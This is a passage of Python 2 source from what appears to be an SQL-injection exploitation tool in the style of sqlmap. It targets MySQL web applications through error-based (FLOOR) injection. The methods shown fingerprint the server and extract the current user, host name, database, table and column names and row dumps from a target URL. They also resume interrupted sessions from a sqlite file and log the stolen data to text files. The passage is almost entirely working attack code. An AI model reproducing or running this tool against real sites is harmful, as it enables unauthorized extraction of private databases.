print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def User(self):
# Table Session to check previous session using Version (Banner) Column
_tableSession = self.tblSession
_colUser = self.colUsr
# Name to fetch for output
_name = "current user"
# flag setting
_flag = "basic"
# Setting path to session.sqlite file
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
# Get data injection
try:
# Previous Session check
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except Exception as e:
# if no previous Session then create it
# Payloads = CURRENTUSER (User extracting payloads)
# Name = _name (current user)
# flag = _flag (basic)
try:
self.XpathInject(_flag, _colUser, _name, CURRENTUSER)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
try:
# Table Session 1st row
row = PrevSession[0]
except Exception as e:
pass
else:
# If Exists data in Table Session
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Request for web app and web server response headers
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
try:
# Previous Session User check
user = sqlite.SessionPrev(self._PathSession, _tableSession, (_colUser).replace(" TEXT", ""))[0][0]
except Exception as e:
# If not exist extract it again from target
self.XpathBasic(_payload, _tableSession, _colUser, _name, CURRENTUSER)
else:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (user)
compat_sleep(0.5)
print compat_color.fw + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
self._logs += "back-end DBMS: MySQL >= 5.1\n"
print compat_color.fw + compat_color.sb + "current user: '%s'" % (user)
self._logs += "current user: %s\n\n" % (user)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def Host(self):
# Table Session to check previous session using Version (Banner) Column
_tableSession = self.tblSession
_colHost = self.colHst
# Name to fetch for output
_name = "host name"
# flag setting
_flag = "basic"
# Setting path to session.sqlite file
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
# Get data injection
try:
# Previous Session check
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except Exception as e:
# if no previous Session then create it
# Payloads = HOSTNAMES (Hosts extracting payloads)
# Name = _name (host)
# flag = _flag (basic)
try:
self.XpathInject(_flag, _colHost, _name, HOSTNAMES)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
try:
# Table Session 1st row
row = PrevSession[0]
except Exception as e:
raise e
else:
# If Exists data in Table Session
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Request for web app and web server response headers
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
try:
# Previous Session host check
host = sqlite.SessionPrev(self._PathSession, _tableSession, (_colHost).replace(" TEXT", ""))[0][0]
except Exception as e:
# If not exist extract it again from target
self.XpathBasic(_payload, _tableSession, _colHost, _name, HOSTNAMES)
else:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (host)
compat_sleep(0.5)
print compat_color.fw + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
self._logs += "back-end DBMS: MySQL >= 5.1\n"
print compat_color.fw + compat_color.sb + "host name: '%s'" % (host)
self._logs += "host name: %s\n\n" % (host)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def Databases(self):
_flag = "advance"
_tableSession = self.tblSession
_tablePayload = self.tblPayload
_colList = [self.colDbp, self.colDbc, self.colDbs]
_nameList = "database names"
_listPayload = [DB_COUNT, DB_NAMES]
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
try:
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except (Exception, IOError) as e:
# Injection if no previous Session found..
try:
__dlist, __dumped = self.XpathInject(_flag, _colList, _nameList, _listPayload)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
print compat_color.fg + compat_color.sb + "available databases [%s]:" % (__dumped)
self._logs += "available databases [%s]:\n" % (__dumped)
for dbs in __dlist:
print compat_color.fg + compat_color.sb + "[*] %s" % (dbs)
self._logs += "[*] %s\n" % (dbs)
else:
try:
row = PrevSession[0]
except Exception as e:
raise e
else:
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
try:
dbsCount = sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[1]).replace(" TEXT", ""))[0][0]
except Exception as e:
# Injection if user interrupted while counting databases (failed to find previous session database count)
_flag = False
__dlist, __dumped = self.XpathAdvance(_flag, _payload, _colList, Name=_nameList, Payloads=_listPayload)
print compat_color.fg + compat_color.sb + "available databases [%s]:" % (__dumped)
self._logs += "available databases [%s]:\n" % (__dumped)
for dbs in __dlist:
print compat_color.fg + compat_color.sb + "[*] %s" % (dbs)
self._logs += "[*] %s\n" % (dbs)
else:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_nameList)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (dbsCount)
try:
dbs_names = (sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[2]).replace(" TEXT", ""))[0][0]).split(",")
except Exception as e:
# Injection if user interrupted while started dumping database names (failed to find previous session for database names)
_flag = True
_dlist, __ = self.XpathAdvance(_flag, _payload, _colList, Payloads=_listPayload, total=dbsCount)
print compat_color.fg + compat_color.sb + "available databases [%s]:" % (dbsCount)
self._logs += "available databases [%s]:\n" % (dbsCount)
for dbs in _dlist:
print compat_color.fg + compat_color.sb + "[*] %s" % (dbs)
self._logs += "[*] %s\n" % (dbs)
else:
for dbs in dbs_names:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (dbs)
if len(dbs_names) == int(dbsCount):
print compat_color.fw + compat_color.sd + "available databases [%s]:" % (dbsCount)
self._logs += "available databases [%s]:\n" % (dbsCount)
for dbs in dbs_names:
print compat_color.fw + compat_color.sd + "[*] %s" % (dbs)
self._logs += "[*] %s\n" % (dbs)
else:
# Injection if user interrupted in between of dumping database names (resuming from previous session dumped database names)
_init = len(dbs_names)
_total = int(dbsCount)
try:
_retVal = (sqlite.SessionPrev(self._PathSession, _tablePayload, (_colList[0]).replace(" TEXT", ""))[0][0])
except Exception as e:
raise e
else:
_ch = ','.join(map(str, dbs_names))
_remaining, _, __dlist, __ = self.XpathDump(_init, _total, _retVal)
_data = '"%s,%s"' % (_ch,_remaining)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colList[2]).replace(" TEXT",""), Data=_data)
dbs_names.extend(__dlist)
print compat_color.fg + compat_color.sb + "available databases [%s]:" % (_total)
self._logs += "available databases [%s]:\n" % (_total)
for dbs in dbs_names:
print compat_color.fg + compat_color.sb + "[*] %s" % (dbs)
self._logs += "[*] %s\n" % (dbs)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def Tables(self, Dbname=None):
_flag = "advance"
_tableSession = self.tblSession
_tablePayload = self.tblPayload
if Dbname:
_dbName = Dbname
_Tblc = "`%sCount` TEXT" % (Dbname)
_Tbls = "`%sNames` TEXT" % (Dbname)
_colList = [self.colTbp, _Tblc, _Tbls]
_nameList = "tables for database: '%s'" % (_dbName)
_listPayload = [TBL_COUNT_FROM_DBS, TBL_DUMP_FROM_DBS]
else:
# Dump tables using default query (where table_Schema != information_Schema)
pass
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
try:
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except (Exception, IOError) as e:
try:
__dlist, __ = self.XpathInject(_flag, _colList, _nameList, _listPayload, Dbname=_dbName)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "[%s tables]:" % (len(__dlist))
self._logs += "[%s tables]:\n" % (len(__dlist))
_tables = compat_prettytable(["Tables"])
_tables.align = "l"
_tables.header = False
for tbl in __dlist:
_tables.add_row([tbl])
print compat_color.fg + compat_color.sb + "%s" % (_tables)
self._logs += "%s\n" % (_tables)
else:
try:
row = PrevSession[0]
except Exception as e:
pass
else:
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
try:
tblsCount = sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[1]).replace(" TEXT", ""))[0][0]
except Exception as e:
_flag = False
_dlist, __ = self.XpathAdvance(_flag, _payload, _colList, Name=_nameList, Payloads=_listPayload, Dbname=_dbName)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "[%s tables]:" % (len(_dlist))
self._logs += "[%s tables]:\n" % (len(_dlist))
_tables = compat_prettytable(["Tables"])
_tables.align = "l"
_tables.header = False
for tbl in _dlist:
_tables.add_row([tbl])
print compat_color.fg + compat_color.sb + "%s" % (_tables)
self._logs += "%s\n" % (_tables)
else:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_nameList)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (tblsCount)
try:
tbls_names = (sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[2]).replace(" TEXT", ""))[0][0]).split(",")
except Exception as e:
_flag = True
_dlist, __ = self.XpathAdvance(_flag, _payload, _colList, Payloads=_listPayload, total=tblsCount, Dbname=_dbName)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "[%s tables]:" % (len(_dlist))
self._logs += "[%s tables]:\n" % (len(_dlist))
_tables = compat_prettytable(["Tables"])
_tables.align = "l"
_tables.header = False
for tbl in _dlist:
_tables.add_row([tbl])
print compat_color.fg + compat_color.sb + "%s" % (_tables)
self._logs += "%s\n" % (_tables)
else:
if len(tbls_names) == int(tblsCount):
print compat_color.fw + compat_color.sd + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fw + compat_color.sd + "[%s tables]:" % (tblsCount)
self._logs += "[%s tables]:\n" % (tblsCount)
_tables = compat_prettytable(["Tables"])
_tables.align = "l"
_tables.header = False
for tbl in tbls_names:
_tables.add_row([tbl])
print compat_color.fw + compat_color.sd + "%s" % (_tables)
self._logs += "%s\n" % (_tables)
else:
_init = len(tbls_names)
_total = int(tblsCount)
try:
_retVal = (sqlite.SessionPrev(self._PathSession, _tablePayload, (_colList[0]).replace(" TEXT", ""))[0][0])
except Exception as e:
raise e
else:
for tbls in tbls_names:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (tbls)
_ch = ','.join(map(str, tbls_names))
_remaining, _, __dlist, __ = self.XpathDump(_init, _total, _retVal)
_data = '"%s,%s"' % (_ch,_remaining)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colList[2]).replace(" TEXT",""), Data=_data)
tbls_names.extend(__dlist)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "[%s tables]:" % (len(tbls_names))
self._logs += "[%s tables]:\n" % (len(tbls_names))
_tables = compat_prettytable(["Tables"])
_tables.align = "l"
_tables.header = False
for tbl in tbls_names:
_tables.add_row([tbl])
print compat_color.fg + compat_color.sb + "%s" % (_tables)
self._logs += "%s\n" % (_tables)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def Columns(self, Dbname=None, TblName=None):
_flag = "advance"
_tableSession = self.tblSession
_tablePayload = self.tblPayload
if Dbname and TblName:
_dbName = Dbname
_tblName = TblName
_Clc = "`%s_%sCount` TEXT" % (_dbName, _tblName)
_Cls = "`%s_%sNames` TEXT" % (_dbName, _tblName)
_colList = [self.colClp, _Clc, _Cls]
_nameList = "columns for table '%s' in database '%s'" % (_tblName ,_dbName)
_listPayload = [COL_COUNT_FROM_TBL, COL_DUMP_FROM_TBL]
else:
# Dump tables using default query (where table_Schema != information_Schema)
pass
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
try:
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except (Exception, IOError) as e:
try:
__dlist, __ = self.XpathInject(_flag, _colList, Name=_nameList, Payloads=_listPayload, Dbname=_dbName, TblName=_tblName)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (_tblName)
self._logs += "Table: %s\n" % (_tblName)
print compat_color.fg + compat_color.sb + "[%s columns]:" % (len(__dlist))
self._logs += "[%s columns]:\n" % (len(__dlist))
_columns = compat_prettytable(["Column"])
_columns.align = "l"
_columns.header = True
for col in __dlist:
_columns.add_row([col])
print compat_color.fg + compat_color.sb + "%s" % (_columns)
self._logs += "%s\n" % (_columns)
else:
try:
row = PrevSession[0]
except Exception as e:
pass
else:
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
try:
colsCount = sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[1]).replace(" TEXT", ""))[0][0]
except Exception as e:
_flag = False
_dlist, __ = self.XpathAdvance(_flag, _payload, _colList, Name=_nameList, Payloads=_listPayload, Dbname=_dbName, TblName=_tblName)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (_tblName)
self._logs += "Table: %s\n" % (_tblName)
print compat_color.fg + compat_color.sb + "[%s columns]:" % (len(_dlist))
self._logs += "[%s columns]:\n" % (len(_dlist))
_columns = compat_prettytable(["Column"])
_columns.align = "l"
_columns.header = True
for col in _dlist:
_columns.add_row([col])
print compat_color.fg + compat_color.sb + "%s" % (_columns)
self._logs += "%s\n" % (_columns)
else:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_nameList)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (colsCount)
try:
cols_names = (sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[2]).replace(" TEXT", ""))[0][0]).split(",")
except Exception as e:
_flag = True
_dlist, __ = self.XpathAdvance(_flag, _payload, _colList, Payloads=_listPayload, total=colsCount, Dbname=_dbName, TblName=_tblName)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (_tblName)
self._logs += "Table: %s\n" % (_tblName)
print compat_color.fg + compat_color.sb + "[%s columns]:" % (len(_dlist))
self._logs += "[%s columns]:\n" % (len(_dlist))
_columns = compat_prettytable(["Column"])
_columns.align = "l"
_columns.header = True
for col in _dlist:
_columns.add_row([col])
print compat_color.fg + compat_color.sb + "%s" % (_columns)
self._logs += "%s\n" % (_columns)
else:
if len(cols_names) == int(colsCount):
print compat_color.fw + compat_color.sd + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fw + compat_color.sd + "Table: %s" % (_tblName)
self._logs += "Table: %s\n" % (_tblName)
print compat_color.fw + compat_color.sd + "[%s columns]:" % (colsCount)
self._logs += "[%s columns]:\n" % (colsCount)
_columns = compat_prettytable(["Column"])
_columns.align = "l"
_columns.header = True
for col in cols_names:
_columns.add_row([col])
print compat_color.fw + compat_color.sd + "%s" % (_columns)
self._logs += "%s\n" % (_columns)
else:
_init = len(cols_names)
_total = int(colsCount)
try:
_retVal = (sqlite.SessionPrev(self._PathSession, _tablePayload, (_colList[0]).replace(" TEXT", ""))[0][0])
except Exception as e:
raise e
else:
for col in cols_names:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (col)
_ch = ','.join(map(str, cols_names))
_remaining, _, __dlist, __ = self.XpathDump(_init, _total, _retVal)
_data = '"%s,%s"' % (_ch,_remaining)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colList[2]).replace(" TEXT",""), Data=_data)
cols_names.extend(__dlist)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (_tblName)
self._logs += "Table: %s\n" % (_tblName)
print compat_color.fg + compat_color.sb + "[%s columns]:" % (len(cols_names))
self._logs += "[%s columns]:\n" % (len(cols_names))
_columns = compat_prettytable(["Column"])
_columns.align = "l"
_columns.header = True
for col in cols_names:
_columns.add_row([col])
print compat_color.fw + compat_color.sd + "%s" % (_columns)
self._logs += "%s\n" % (_columns)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def Dumps(self, Dbname=None, TblName=None, ColList=None):
_flag = "advance"
_tableSession = self.tblSession
_tablePayload = self.tblPayload
if Dbname and TblName and ColList:
_dbName = Dbname
_tblName = "`%s`" % (TblName)
_colN = "%s" % (ColList if not " " in ColList else (ColList.replace(" ","")))
_colsDumpList = ("`%s`" % (ColList.replace(",","`,`") if not " " in ColList else ((ColList.replace(" ","")).replace(",", "`,`")))).split(",")
_colDtc = "`%s_%sDataCount` TEXT" % (Dbname, TblName)
_colDts = "`%s_%sDumps` TEXT" % (Dbname, TblName)
_colList = [self.colDtp, _colDtc, _colDts]
_nameList = "entries of column(s) '%s' for table '%s' in database '%s'" % (_colN,_tblName ,_dbName)
_listPayload = [REC_COUNT_FROM_TBL, REC_DUMP_FROM_TBL]
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
try:
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except (Exception, IOError) as e:
try:
__dlist = self.XpathInject(_flag, _colList, Name=_nameList, Payloads=_listPayload, Dbname=_dbName, TblName=_tblName, ColList=_colsDumpList)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (TblName)
self._logs += "Table: %s\n" % (TblName)
print compat_color.fg + compat_color.sb + "%s" % (__dlist)
self._logs += "%s\n" % (__dlist)
else:
try:
row = PrevSession[0]
except Exception as e:
pass
else:
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
try:
dataCount = sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[1]).replace(" TEXT", ""))[0][0]
except Exception as e:
